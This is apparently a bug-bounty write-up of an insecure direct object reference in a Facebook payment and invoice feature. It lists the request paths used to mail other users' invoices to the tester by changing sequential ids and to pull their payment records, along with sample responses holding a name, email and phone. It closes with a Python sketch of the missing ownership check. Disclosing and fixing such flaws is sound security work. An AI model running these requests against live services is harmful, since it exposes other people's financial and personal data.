While I was testing on Facebook, I found an option to send an invoice to email.
This option is used in many places on Facebook: Ads accounts, business accounts, Instagram...
Viewing the request for that option, I found out that it uses an incrementing id:
POST /fb-payment/7777777/send-email
In this request I could send any invoice to my email by changing the id.
Continuing to test, I found an easier way to get invoices:
POST /fb-payment/7777777/execute
The response for it was:
{"amount":777,"payment_method_id":"EX","country":"EG","refrence_number":"777","order_id":"777","status":"pending","create_data":"2020-9-10T05:08:08"}
Continuing the search, with some reading of documentation and some fuzzing, I found that I could use the “order_id” and “payment_method_id” to retrieve payment information.
I can get these variables for all the users who tried that option from the previous request, which uses an incrementing id that is not random at all.
Retrieve payments information
GET /fb-payments?payment_method_code=XX&payment_id=XXXXXXXXXXXXXXXX&payer_amount=null&currency=nulll&country=null&redirect=https://facebook.com
The response to this request was:
{"id":7777777,"state":"PENDING","amount":400,"currency":"EGP","country":"EG","redirect":"https://facebook.com","payment_method_code":"EX","name":"Mustafa Ahmed","user_id":100,"email":"example@example.com","phone":"01111111111","user_agent":{"ua":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36","browser":{"name":"Chrome","version":"85.0.4183.121","major":"85"},"engine":{"name":"Blink"},"os":{"name":"Windows","version":"10"},"device":{},"cpu":{"architecture":"amd64"}}}
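The control missing from the requests above is an object-level authorization check on the id in the path. The sketch below is an added example, not code from this write-up or from Facebook: it puts an unchecked handler beside a checked one. The store, function names and sample values are hypothetical and constructed for illustration.

```python
import secrets
from dataclasses import dataclass

@dataclass
class Invoice:
    owner_id: int   # account that created the payment
    email: str      # billing address held on file
    amount: int

class Forbidden(Exception):
    """Raised when the caller may not access the requested invoice."""

class InvoiceStore:
    """Hypothetical in-memory stand-in for the payment backend."""
    def __init__(self):
        self._by_id = {}
        self._next = 7777777  # constructed starting value

    def create_sequential(self, inv):
        # Pattern described in the post: ids increase by one per payment.
        self._next += 1
        self._by_id[str(self._next)] = inv
        return str(self._next)

    def create_random(self, inv):
        # 128-bit random id: defence in depth, not a substitute for authz.
        ref = secrets.token_urlsafe(16)
        self._by_id[ref] = inv
        return ref

    def get(self, ref):
        return self._by_id.get(ref)

def send_invoice_unchecked(store, ref, to_email):
    """'Before': any caller, any id, any destination address."""
    inv = store.get(ref)
    return (to_email, inv.amount) if inv else None

def send_invoice_checked(store, session_user_id, ref):
    """'After': owner only, and mail goes to the address on file."""
    inv = store.get(ref)
    # Same error for "missing" and "not yours" so ids cannot be probed.
    if inv is None or inv.owner_id != session_user_id:
        raise Forbidden("invoice not found")
    return (inv.email, inv.amount)
```

Random ids only make references harder to guess; the ownership comparison in send_invoice_checked is what actually closes the hole.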